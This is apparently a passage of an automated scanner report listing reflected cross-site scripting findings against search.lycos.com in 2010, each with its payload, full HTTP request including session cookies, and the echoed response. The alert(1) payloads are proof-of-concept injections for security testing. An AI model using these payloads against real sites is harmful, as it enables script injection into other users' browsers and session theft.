<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images6a61f"><script>alert(1)</script>cb2791bb9c4&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.124. http://search.lycos.com/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b88f"%3balert(1)//ab61ce09937 was submitted in the cat parameter. This input was echoed as 2b88f";alert(1)//ab61ce09937 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=multi&cat=images2b88f"%3balert(1)//ab61ce09937 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_images2b88f";alert(1)//ab61ce09937";
//-->
...[SNIP]...

1.125. http://search.lycos.com/ [mobile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8ead"><script>alert(1)</script>b7a2c77f357 was submitted in the mobile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357&mobile=1">
...[SNIP]...

1.126. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca07a"><script>alert(1)</script>4cdc20754fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:33 GMT; path=/
Set-Cookie: LYCOS_SEARCH=i4ndl3gvfld9s3lgl65ehmk080; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1&mobile=1">
...[SNIP]...

1.127. http://search.lycos.com/ [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8f5"><script>alert(1)</script>616be4478a0 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:12 GMT; path=/
Set-Cookie: LYCOS_SEARCH=p6laldmb2g7ohngk9ohi37mec0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0&mobile=1">
...[SNIP]...

1.128. http://search.lycos.com/ [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34964"%3balert(1)//0334fee274d was submitted in the query parameter. This input was echoed as 34964";alert(1)//0334fee274d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=web&query=%2734964"%3balert(1)//0334fee274d&x=0&y=0&mobile=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=1; expires=Mon, 12-Dec-2011 14:35:12 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
tab = "web";
offset = 0+1;
query = "'34964";alert(1)//0334fee274d";
not_default = true;
</script>
...[SNIP]...

1.129. http://search.lycos.com/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf21"><script>alert(1)</script>170bf3715a3 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query= HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PARTNER=lycos502bf21%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E170bf3715a3
Set-Cookie: PARTNER=deleted; expires=Sat, 12-Dec-2009 14:35:02 GMT
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query=&mobile=1">
...[SNIP]...

1.130. http://search.lycos.com/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714e4"><script>alert(1)</script>1c8e17eea03 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web714e4"><script>alert(1)</script>1c8e17eea03&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:07 GMT; path=/
Set-Cookie: LYCOS_SEARCH=0roaos6kqiohp2a9qr66pi4uc3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_web714e4"><script>alert(1)</script>1c8e17eea03&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.131. http://search.lycos.com/ [x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb19"><script>alert(1)</script>384854fefb5 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:17 GMT; path=/
Set-Cookie: LYCOS_SEARCH=3nnouoedqulhb6jgumc9falmu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0&mobile=1">
...[SNIP]...

1.132. http://search.lycos.com/ [y parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427d8"><script>alert(1)</script>ca48fe7296 was submitted in the y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:19 GMT; path=/
Set-Cookie: LYCOS_SEARCH=opld2sr244q0u26cc1hfeg7cj7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296&mobile=1">
...[SNIP]...

1.133. http://search.lycos.com/image/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d10"><script>alert(1)</script>11d3b1192c5 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?tab=multi&cat=imagesb8d10"><script>alert(1)</script>11d3b1192c5 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_imagesb8d10"><script>alert(1)</script>11d3b1192c5&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.134. http://search.lycos.com/image/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67115"%3balert(1)//4e88d6bcb17 was submitted in the cat parameter. This input was echoed as 67115";alert(1)//4e88d6bcb17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /image/?tab=multi&cat=images67115"%3balert(1)//4e88d6bcb17 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_images67115";alert(1)//4e88d6bcb17";
//-->
...[SNIP]...

1.135. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc05"><script>alert(1)</script>f6d897429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?acc05"><script>alert(1)</script>f6d897429=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?acc05"><script>alert(1)</script>f6d897429=1&mobile=1">
...[SNIP]...

1.136. http://search.lycos.com/image/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf1c"><script>alert(1)</script>be82f60f06e was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?tab=multiaaf1c"><script>alert(1)</script>be82f60f06e&cat=images HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
